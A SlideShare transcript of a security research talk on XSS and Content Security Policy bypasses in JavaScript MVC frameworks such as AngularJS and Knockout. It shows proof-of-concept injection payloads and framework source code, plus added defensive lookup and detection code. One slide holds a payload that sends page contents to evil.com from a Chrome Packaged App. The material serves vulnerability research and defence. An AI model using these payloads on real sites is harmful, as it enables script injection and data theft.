JSMVCOMFG
To sternly look at JavaScript MVC and Templating Frameworks
A presentation by Mario Heiderich
mario@cure53.de || @0x6D6172696F
Infosec Hobgoblin
● Dr.-Ing. Mario Heiderich
● Researcher and Post-Doc, Ruhr-Uni Bochum
  – PhD Thesis on Client Side Security and Defense
● Founder of Cure53
  – Penetration Testing Firm
  – Consulting, Workshops, Trainings
  – Simply the Best Company of the World
● Published author and international speaker
  – Specialized in HTML5 and SVG Security
  – JavaScript, XSS and Client Side Attacks
● HTML5 Security Cheatsheet
● And something new!
  – @0x6D6172696F
  – mario@cure53.de
Today
● JavaScript MVC & Templating Frameworks
● Why? Because they are becoming popular
● Yes, we have numbers, wait for it...
● And they are special
● Are there security flaws?
● If yes (heh.. if..) what can we learn from them?
What are they
● Written in JavaScript
● Often huge
● Often very complex
● Often maintained by corporations
● Interfaces to enable different coding styles
● Extending, optimizing, changing
  – The way developers work with JavaScript
  – The way web applications used to work
What do they do?
● Claims
  – “More productive out of the box” (EmberJS)
  – “AngularJS lets you extend HTML vocabulary for your application” (AngularJS)
  – “Fast templates, responsive widgets” (CanJS)
  – “Simple and intuitive, powerful and extensible, lightning fast” (JsRender)
Examples
<script type="text/x-handlebars">
{{outlet}}
</script>
<script type="text/x-handlebars" id="x">
<h1>People</h1>
<ul>
{{#each model}}
<li>Hello, <b>{{fullName}}</b>!</li>
{{/each}}
</ul>
</script>

App = Ember.Application.create();
App.Person = Ember.Object.extend({
  firstName: null, lastName: null,
  fullName: function() {
    return this.get('firstName') + " " + this.get('lastName');
  }.property('firstName', 'lastName')
});
App.IndexRoute = Ember.Route.extend({
  model: function() {
    var people = [
      App.Person.create({
        firstName: "Frank",
        lastName: "N. Stein"
      }) ];
    return people;
  }});
Examples
<!doctype html>
<html ng-app>
<head>
<script src="angular.min.js"></script>
</head>
<body>
<div>
<label>Name:</label>
<input type="text" ng-model="yourName" placeholder="Your name">
<hr>
<h1>Hello {{yourName}}!</h1>
</div>
</body>
</html>
Examples
<div class="liveExample" id="x">
<select data-bind="options: tickets,
optionsCaption: 'Choose...',
optionsText: 'name',
value: chosenTicket">
<option value="">Economy</option>
<option value="">Business</option>
<option value="">First Class</option>
</select>
<button data-bind="enable: chosenTicket,
click: resetTicket" disabled="">Clear</button>
<p data-bind="with: chosenTicket"></p>
<script type="text/javascript">
function TicketsViewModel() {
this.tickets = [
{ name: "Economy", price: 199.95 },
{ name: "Business", price: 449.22 },
{ name: "First Class", price: 1199.99 }
];
this.chosenTicket = ko.observable();
this.resetTicket = function() { this.chosenTicket(null) }
}
ko.applyBindings(new TicketsViewModel(), document.getElementById("x"));
</script>
</div>

Binding stuff

Raw Data!

Puttin' it togetha
So..
● JSMVC Frameworks do the following
● They extend the DOM
● They “abstractify” the DOM
● They provide new interfaces
● They often use script-templates or “data blocks”
  – “The script element allows authors to include dynamic script and data blocks in their documents.” (WHATWG HTML5, Approved!)
  – Sometimes ERB-style
  – Often Mustache-style
  – Sometimes something completely different
● They often use markup-sugar
  – Custom elements, <hellokitty>
  – HTML5 data attributes
Mustache
● Specified in 2009 by Wanstrath
● {{ stuff }}
● {{#is_true}} Bla {{/is_true}}
JSMVC and Security
● Initial rationale for security research
  – It's trending, it's complex, it's different
  – What else do we need... nothing
● Poke-first, analyze later
  – Pick a target, thanks TodoMVC!
  – Explore debugging possibilities
● Goal: Execute arbitrary JavaScript, maybe more
  – Using otherwise uncommon ways
  – Using the JSMVC capabilities
  – Assume injection, assume conventional XSS filter
● After poking, derive a metric for JSMVC security
Pokes
● Why not start with KnockoutJS
<script src="knockout-2.3.0.js"></script>
<div data-bind="x:alert(1)" />
<script>
ko.applyBindings();
</script>
Wait...
● JavaScript from within a data-attribute?
● No extra magic, just the colon?
● That's right
● See where we are heading with this?
● Knockout knocks out XSS filters
  – Chrome's XSS Auditor
  – IE's XSS Filter
  – Anything that allows data attributes
● This behavior breaks existing security assumptions!
The reason
● “eval” via “Function”
parseBindingsString: function(b, c, d) {
  try {
    var f;
    if (!(f = this.Na[b])) {
      var g = this.Na, e, m = "with($context){with($data||{}){return{" + a.g.ea(b) + "}}}";
      e = new Function("$context", "$element", m);
      f = g[b] = e
    }
    return f(c, d)
  } catch (h) {
    throw h.message = "Unable to parse bindings.\nBindings value: " + b + "\nMessage: " + h.message, h;
  }
}
Keep pokin'
● CanJS for example
<script src="jquery-2.0.3.min.js"></script>
<script src="can.jquery.js"></script>
<body>
<script type="text/ejs" id="todoList">
<%==($a)->abc})-alert(1)-can.proxy(function(){%>
</script>
<script>
can.view('todoList', {});
</script>
</body>
Reason
● A copy of “eval” called “myEval”
myEval = function(script) {
  eval(script);
},
[...]
var template = buff.join(''),
  out = {
    out: 'with(_VIEW) { with (_CONTEXT) {' + template + " " + finishTxt + "}}"
  };
// Use `eval` instead of creating a function, because it is easier to debug.
myEval.call(out, 'this.fn = (function(_CONTEXT,_VIEW){' + out.out + '});\r\n//@ sourceURL=' + name + ".jjs");
return out;
And even more...
<script src="jquery-1.7.1.min.js"></script>
<script src="kendo.all.min.js"></script>
<div id="x"># alert(1) #</div>
<script>
var template = kendo.template($("#x").html());
var tasks = [{ id: 1}];
var dataSource = new kendo.data.DataSource({ data: tasks });
dataSource.bind("change", function(e) {
var html = kendo.render(template, this.view());
});
dataSource.read();
</script>
Keeeeep Pokin'
● AngularJS 1.1.x
<script src="angular.min.js"></script>
<div class="ng-app">
{{constructor.constructor('alert(1)')()}}
</div>

● Or this – even with encoded mustaches
<script src="angular.min.js"></script>
<div class="ng-app">
&#x7b;&#x7b;constructor.constructor('alert(1)')()&#x7d;&#x7d;
</div>
Reason
● “eval” via “Function”
var code = 'var l, fn, p;\n';
forEach(pathKeys, function(key, index) {
  code += 'if(s === null || s === undefined) return s;\n' +
    'l=s;\n' +
    's=' + (index
      // we simply dereference 's' on any .dot notation
      ? 's'
      // but if we are first then we check locals first, and if so read it first
      : '((k&&k.hasOwnProperty("' + key + '"))?k:s)') + '["' + key + '"]' + ';\n' +
    […]
    '}\n' +
    ' s=s.$$v\n' +
    '}\n';
});
code += 'return s;';
fn = Function('s', 'k', code); // s=scope, k=locals
fn.toString = function() {
  return code;
};
Sadly for the attacker...
● They fixed it in 1.2.x
● Dammit!
● Good test-cases too! Look...
function ensureSafeObject(obj, fullExpression) {
  // nifty check if obj is Function that is fast … other contexts
  if (obj && obj.constructor === obj) {
    throw $parseMinErr('isecfn', 'Referencing Function in Angular expressions is disallowed! Expression: {0}', fullExpression);
  } else {
    return obj;
  }
}
Not that hard to solve
var foo = {};
foo.bar = 123;
foo.baz = 456;
console.log(foo.hasOwnProperty('bar'));         // true
console.log(foo.hasOwnProperty('baz'));         // true
console.log(foo.hasOwnProperty('constructor')); // false
console.log(foo.hasOwnProperty('__proto__'));   // false
console.log(foo.hasOwnProperty('prototype'));   // false
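The two checks the slides point at (an own-property walk with hasOwnProperty, and the "constructor === itself" test that identifies Function) combine into a small scope lookup. The following is an added example written for this page, not code from the talk or from AngularJS, Knockout or CanJS; the names safeGet, SafeLookupError and the scope objects are assumptions made for the demo.

```javascript
// Added example: a property-path resolver for template expressions that can
// reach data on the scope but never the Function constructor or anything
// inherited from a prototype. Names are assumptions, not a framework API.
class SafeLookupError extends Error {}

const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Same idea as AngularJS 1.2's ensureSafeObject: Function is the only object
// whose constructor is itself, and the test needs no reference to the Function
// of the current realm, so it also holds across iframes.
function ensureSafeObject(obj, fullExpression) {
  if (obj && obj.constructor === obj) {
    throw new SafeLookupError(
      'Referencing Function in expressions is disallowed! Expression: ' + fullExpression);
  }
  return obj;
}

// Resolve a dotted path such as "a.b.c" against scope (and, for the first
// segment, an optional locals object). Every step only follows own
// properties, so "constructor", "__proto__" or "prototype" resolve to
// undefined instead of walking up the prototype chain.
function safeGet(scope, path, locals) {
  const keys = path.split('.');
  let s = scope;
  for (let index = 0; index < keys.length; index++) {
    const key = keys[index];
    if (s === null || s === undefined) return s;   // nothing to dereference
    let holder = s;
    if (index === 0 && locals && hasOwn(locals, key)) holder = locals;
    if (!hasOwn(holder, key)) return undefined;     // inherited or absent
    s = ensureSafeObject(holder[key], path);
  }
  return s;
}

// The slide's own objects, resolved through the safe walk.
const foo = { bar: 123, baz: 456 };
console.log(safeGet(foo, 'bar'));                   // 123
console.log(safeGet(foo, 'constructor'));           // undefined
console.log(safeGet(foo, 'constructor.constructor')); // undefined
```

The own-property rule is what closes the {{constructor.constructor(...)}} path: the first segment never resolves, so there is nothing to call. The Function check is the belt to that suspender, for the case where an own property legitimately holds a function object.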
CSP
● Most of the JSMVC will not work with CSP
● At least not without unsafe-eval
● That's not gonna help evangelize CSP
● Although there's hope – AngularJS
<div ng-app ng-csp>
AngularJS
● Features a special CSP mode
● Said to be 30% slower
● But enables AngularJS to work
● Even without unsafe-eval or other nasties
● Magick!
● It also brings back script injections
<?php
header("X-Content-Security-Policy: default-src 'self'");
header("Content-Security-Policy: default-src 'self'");
header("X-Webkit-CSP: default-src 'self'");
?>
<!doctype html>
<html ng-app ng-csp>
<head>
<script src="angular.min.js"></script>
</head>
<body onclick="alert(1)">
Click me
<h1 ng-mouseover="$event.view.alert(2)">
Hover me
</h1>
</body>

Proper CSP!
How do they do it?
I. Parse the “ng”-attributes
II. Slice out the relevant parts
III. Create anonymous functions
IV. Connect them with events
V. Wait for event handler to fire
$element.onclick=function($event){
$event['view']['alert']('1')
}
● It's technically not in-line
● Neither is any “eval” being used
So, enabling the JSMVC to work with CSP
(partly) kills the protection CSP delivers?
Aw, yeah, being a pen-tester these days!
“Packaged apps deliver an experience as capable as a native
app, but as safe as a web page. Just like web apps, packaged
apps are written in HTML5, JavaScript, and CSS.”
Uhm...
“Packaged apps have access to Chrome APIs and services not
available to traditional web sites. You can build powerful apps
that interact with network and hardware devices, media tools,
and much more.”
:-O
It's bad
“Ever played with Chrome Packaged Apps?”
● Very powerful tools
● Similar yet not equivalent to extensions
● Melting the barrier between web and desktop
● HTML + JS + many APIs
● CSP enabled by default
● And work great with AngularJS (of course)
Doing the Nasty
● Let's bypass CSP in CPA using Angular
● And escalate some privileges
Benign
The HTML of our fancy app
<!doctype html>
<html ng-app ng-csp>
<head>
<script src="angular.min.js"></script>
<script src="controller.js"></script>
<link rel="stylesheet" href="todo.css">
</head>
<body>
<h2>Todo</h2>
<div ng-controller="TodoCtrl">
<span>{{remaining()}} of {{todos.length}} remaining</span>
[ <a href="" ng-click="archive()">archive</a> ]
<ul class="unstyled">
<li ng-repeat="todo in todos">
<input type="checkbox" ng-model="todo.done">
<span class="done-{{todo.done}}">{{todo.text}}</span>
</li>
</ul>
</div>
</body>
</html>
Benign
function TodoCtrl($scope) {
$scope.todos = [
{text:'learn angular', done:true},
{text:'build an angular app', done:false}];
$scope.remaining = function() {
var count = 0;
angular.forEach($scope.todos, function(todo) {
count += todo.done ? 0 : 1;
});
return count;
};
$scope.archive = function() {
var oldTodos = $scope.todos;
$scope.todos = [];
angular.forEach(oldTodos, function(todo) {
if (!todo.done) $scope.todos.push(todo);
});
};
}

Our Controller Code, AngularJS
Benign
{
"manifest_version": 2,
"name": "Lab3b MVC with controller",
"permissions": ["webview"],
"version": "1",
"app": {
"background": {
"scripts": ["main.js"]
}
},
"icons": { "128": "icon.png" }
}

The Manifest, Permissions too
Attacked
<!doctype html>
<html ng-app ng-csp>
<head>
<script src="angular.min.js"></script>
<script src="controller.js"></script>
<link rel="stylesheet" href="todo.css">
</head>
<body>
<h2 ng-click="invalid(
w=$event.view,
x=w.document.createElement('webview'),
x.src='http://evil.com/?'+w.btoa(w.document.body.innerHTML),
w.document.body.appendChild(x)
)">Todo-shmoodoo</h2>
<div ng-controller="TodoCtrl">
<span>{{remaining()}} of {{todos.length}} remaining</span>
[ <a href="" ng-click="archive()">archive</a> ]
<ul class="unstyled">
<li ng-repeat="todo in todos">
<input type="checkbox" ng-model="todo.done">
<span class="done-{{todo.done}}">{{todo.text}}</span>
</li>
</ul>
</div>
</body>
</html>

Oh, Sh*t!
Happy testing –
there's a lot more to find!
For example this...
<div class="ng-include:'//ø.pw'">
More CSP Bypasses
● And even a much better one
  – Upload a GIF
  – Inject a class attribute
  – Get a free AngularJS + HTML5 CSP Bypass
● Wanna see?
Let's upload a pic!
It's a valid GIF but also contains payload!
Now we inject a class attribute – including the image as HTML!
<span class="ng-include:'test.gif'"></span>
Now it imports itself
<link rel="import" href="test.gif">
Thereby loads itself as JS
<script src="test.gif"></script>
“And pop goes the weasel”
“It looks like we will agree to disagree on the importance of the
HTML imports issue -- we don't think it's possible for a third
party to execute arbitrary Javascript via the process you
describe, so the risk of unsanitized HTML would be one that the
developer was taking on deliberately.”
Quick Recap
● What have we seen today
  – Rotten Markup-Sugar
  – JavaScript exec. from data-attributes
  – JavaScript exec. from any element
  – JavaScript exec. within encoded mustache
  – A full-blown CSP Bypass
  – The reasons for all these
  – Oh – and an attack against Chrome Packaged Apps
● And it was just the tip of the iceberg
● Lots of “eval” and bad coding practices
“Markup-Sugar considered dangerous”
Metrics
● While root causes persist, new challenges arise
● We need to build metrics
● After having analyzed 12 frameworks: Here's a proposal
{}SEC-A Are template expressions equivalent to a JavaScript eval?
{}SEC-B Is the execution scope well isolated or sand-boxed?
{}SEC-C Can arbitrary HTML elements serve as template containers?
{}SEC-D Does the framework allow, encourage or even enforce separation of code and content?
{}SEC-E Does the framework maintainer have a security response program?
{}SEC-F Does the Framework allow safe CSP rules to be used?
Conclusion
● JSMVC requires new security requirements
● No reflected content from the server within template containers
● Sometimes, everything is a template container
● Strict separation is necessary
● And there is hope!
● Maybe JSMVC eliminates XSS
● Because it changes how we design applications.
● And does so by boosting and not hindering productivity
● Interested in collaborating on this? Contact me!
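The conclusion ("no reflected content within template containers", "strict separation") and the earlier pokes (Knockout's data-bind, the entity-encoded mustaches, the ng-include class) suggest two defender-side pieces: a screening check that looks at untrusted content the way the framework will see it, after entity decoding, and the data-block pattern (SEC-D) that keeps server data out of the compiled template altogether. The following is an added example written for this page, not code from the talk or from any of the frameworks; the function names, the rule list and the sample inputs are constructed for the demo, and the regex rules are a screening heuristic, not an HTML sanitizer.

```javascript
// Added example (not from the talk or any framework). Two defensive pieces:
// findMarkupSugar() screens untrusted content for framework syntax after
// entity decoding, and renderDataBlock() ships data as a JSON data block so
// it never sits inside a template container. All names are assumptions.

// Decode numeric (&#123; / &#x7b;) and the few named entities relevant here:
// the framework compiles the DOM text, not the encoded source, so the check
// has to look at the decoded form.
const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", lbrace: '{', rbrace: '}' };
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const name = body.toLowerCase();
    return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : match;
  });
}

// One rule per kind of markup sugar the talk shows being abused. Constructed
// for this example; extend per framework in use.
const RULES = [
  { id: 'interpolation', re: /\{\{[\s\S]*?\}\}/,                     why: 'Mustache/AngularJS interpolation marker' },
  { id: 'erb-template',  re: /<%[\s\S]*?%>/,                        why: 'ERB-style template tag (CanJS/EJS)' },
  { id: 'data-bind',     re: /\sdata-bind\s*=/i,                    why: 'KnockoutJS binding attribute' },
  { id: 'ng-attribute',  re: /\s(?:ng-|data-ng-|x-ng-)[\w-]+\s*=/i, why: 'AngularJS directive attribute' },
  { id: 'ng-class',      re: /\sclass\s*=\s*["'][^"']*\bng-/i,      why: 'AngularJS directive in a class attribute (e.g. ng-include:)' },
];

// Returns the rules that fire on the decoded content (empty array = clean).
function findMarkupSugar(untrusted) {
  const decoded = decodeEntities(untrusted);
  return RULES.filter(r => r.re.test(decoded)).map(r => ({ id: r.id, why: r.why }));
}

function isSafeForTemplateContainer(untrusted) {
  return findMarkupSugar(untrusted).length === 0;
}

// The structural fix (SEC-D): data travels in a <script type="application/json">
// data block that the controller reads with JSON.parse, instead of being
// written into markup the framework compiles. "<" is escaped inside the JSON
// so the block cannot be terminated by "</script>" or "<!--" in the data.
function renderDataBlock(id, data) {
  const json = JSON.stringify(data)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return '<script type="application/json" id="' + id + '">' + json + '</script>';
}

// Constructed inputs modelled on the slides' payload shapes.
console.log(findMarkupSugar('<div data-bind="x:alert(1)"></div>'));
console.log(findMarkupSugar('&#x7b;&#x7b;1+1&#x7d;&#x7d;'));
console.log(renderDataBlock('todos', [{ text: 'learn angular', done: true }]));
```

The screening check belongs at the point where server-side content would be reflected into a page the framework compiles; a hit should be treated as "do not put this in a template container", not as something to patch up with more encoding, since the encoded-mustache poke shows encoding alone does not help. The data block is the pattern that removes the question: the controller reads it with `JSON.parse(document.getElementById('todos').textContent)` and the template only ever binds to scope data.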
The End
● Questions?
● Comments?

More Related Content

What's hot

Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
Mario Heiderich
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill
Mario Heiderich
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG Files
Mario Heiderich
 

What's hot (20)

Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORM
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG Files
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
 
Lightweight static code analysis with semgrep
Lightweight static code analysis with semgrepLightweight static code analysis with semgrep
Lightweight static code analysis with semgrep
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation  Red Pill2017How fun of privilege escalation  Red Pill2017
How fun of privilege escalation Red Pill2017
 

Viewers also liked

AngularJS Security: defend your Single Page Application
AngularJS Security: defend your Single Page Application AngularJS Security: defend your Single Page Application
AngularJS Security: defend your Single Page Application
Carlo Bonamico
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
Igor Bossenko
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
Mario Heiderich
 

Viewers also liked (13)

AngularJS Security: defend your Single Page Application
AngularJS Security: defend your Single Page Application AngularJS Security: defend your Single Page Application
AngularJS Security: defend your Single Page Application
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
 
AngularJS
AngularJSAngularJS
AngularJS
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
 
Hash DoS Attack
Hash DoS AttackHash DoS Attack
Hash DoS Attack
 
(Не)безопасный frontend
(Не)безопасный frontend(Не)безопасный frontend
(Не)безопасный frontend
 
Sparkly Notebook: Interactive Analysis and Visualization with Spark
Sparkly Notebook: Interactive Analysis and Visualization with SparkSparkly Notebook: Interactive Analysis and Visualization with Spark
Sparkly Notebook: Interactive Analysis and Visualization with Spark
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applications
 
Comparing Hot JavaScript Frameworks: AngularJS, Ember.js and React.js - Sprin...
Comparing Hot JavaScript Frameworks: AngularJS, Ember.js and React.js - Sprin...Comparing Hot JavaScript Frameworks: AngularJS, Ember.js and React.js - Sprin...
Comparing Hot JavaScript Frameworks: AngularJS, Ember.js and React.js - Sprin...
 
Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)
 
Web Wuermer
Web WuermerWeb Wuermer
Web Wuermer
 
Big Data visualization with Apache Spark and Zeppelin
Big Data visualization with Apache Spark and ZeppelinBig Data visualization with Apache Spark and Zeppelin
Big Data visualization with Apache Spark and Zeppelin
 
SlideShare 101
SlideShare 101SlideShare 101
SlideShare 101
 

Similar to JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks

gDayX 2013 - Advanced AngularJS - Nicolas Embleton
gDayX 2013 - Advanced AngularJS - Nicolas EmbletongDayX 2013 - Advanced AngularJS - Nicolas Embleton
gDayX 2013 - Advanced AngularJS - Nicolas Embleton
George Nguyen
 
gDayX - Advanced angularjs
gDayX - Advanced angularjsgDayX - Advanced angularjs
gDayX - Advanced angularjs
gdgvietnam
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
Igor Bronovskyy
 
Security on Rails
Security on RailsSecurity on Rails
Security on Rails
David Paluy
 

Similar to JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks (20)

StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
 
Nicolas Embleton, Advanced Angular JS
Nicolas Embleton, Advanced Angular JSNicolas Embleton, Advanced Angular JS
Nicolas Embleton, Advanced Angular JS
 
Wt unit 2 ppts client sied technology
Wt unit 2 ppts client sied technologyWt unit 2 ppts client sied technology
Wt unit 2 ppts client sied technology
 
Wt unit 2 ppts client side technology
Wt unit 2 ppts client side technologyWt unit 2 ppts client side technology
Wt unit 2 ppts client side technology
 
GDayX - Advanced Angular.JS
GDayX - Advanced Angular.JSGDayX - Advanced Angular.JS
GDayX - Advanced Angular.JS
 
Reviewing AngularJS
Reviewing AngularJSReviewing AngularJS
Reviewing AngularJS
 
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
 
Modern Web Technologies
Modern Web TechnologiesModern Web Technologies
Modern Web Technologies
 
Webpack
Webpack Webpack
Webpack
 
The MEAN stack
The MEAN stack The MEAN stack
The MEAN stack
 
gDayX 2013 - Advanced AngularJS - Nicolas Embleton
gDayX 2013 - Advanced AngularJS - Nicolas EmbletongDayX 2013 - Advanced AngularJS - Nicolas Embleton
gDayX 2013 - Advanced AngularJS - Nicolas Embleton
 
20141002 delapsley-socalangularjs-final
20141002 delapsley-socalangularjs-final20141002 delapsley-socalangularjs-final
20141002 delapsley-socalangularjs-final
 
Introduction to AngularJS
Introduction to AngularJSIntroduction to AngularJS
Introduction to AngularJS
 
gDayX - Advanced angularjs
gDayX - Advanced angularjsgDayX - Advanced angularjs
gDayX - Advanced angularjs
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
 
Security on Rails
Security on RailsSecurity on Rails
Security on Rails
 
EP2016 - Moving Away From Nodejs To A Pure Python Solution For Assets
EP2016 - Moving Away From Nodejs To A Pure Python Solution For AssetsEP2016 - Moving Away From Nodejs To A Pure Python Solution For Assets
EP2016 - Moving Away From Nodejs To A Pure Python Solution For Assets
 
Introduction of angular js
Introduction of angular jsIntroduction of angular js
Introduction of angular js
 
Angular JS, steal the idea
Angular JS, steal the ideaAngular JS, steal the idea
Angular JS, steal the idea
 
Dive into AngularJS and directives
Dive into AngularJS and directivesDive into AngularJS and directives
Dive into AngularJS and directives
 

More from Mario Heiderich

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Mario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
Mario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
Mario Heiderich
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
Mario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
Mario Heiderich
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
Mario Heiderich
 

More from Mario Heiderich (8)

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!
 

Recently uploaded

Recently uploaded (20)

Scaling API-first – The story of a global engineering organization
